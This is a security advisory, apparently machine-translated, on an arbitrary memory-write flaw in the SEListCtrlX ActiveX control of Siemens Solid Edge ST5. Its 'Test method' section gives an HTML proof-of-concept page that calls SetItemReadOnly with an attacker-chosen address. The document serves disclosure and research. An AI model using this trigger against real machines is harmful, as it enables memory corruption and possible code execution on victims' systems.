Release date:
Updated on: 2013-05-30
Affected Systems:
Siemens Solid Edge ST5 105.x
Siemens SEListCtrlX ActiveX Control 105.x
Siemens WebPartHelper ActiveX Control 105.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 60161
SolidEdge is the 3D CAD Software of Siemens PLM Software. It uses the patented Parasolid of Siemens PLM Software as the core Software, combining popular CAD systems with the world's most advanced entity modeling engine is a powerful and easy-to-use three-dimensional CAD software based on the Windows platform.
The Siemens Solid Edge SEListCtrlX ActiveX Control contains an insecure method "SetItemReadOnly ()" (SEListCTRLX. ocx), which allows remote attackers to write some values in any memory location.
<* Source: rgod (rgod@autistici.org)
Link: http://secunia.com/advisories/53595/
Http://retrogod.altervista.org/9sg_siemens_adv_ii.htm
*>
Test method:
--------------------------------------------------------------------------------
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
<! -- Save from url = (0014) about: internet -->
<Html>
<Object classid = 'clsid: 5D6A72E6-C12F-4C72-ABF3-32F6B70EBB0D 'id = 'obj'/>
</Object>
<Script language = 'javascript '>
// Obj. SetItemReadOnly (0x61616161, false );
Obj. SetItemReadOnly (0x61616161, true );
</Script>
Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
Siemens
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
Http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm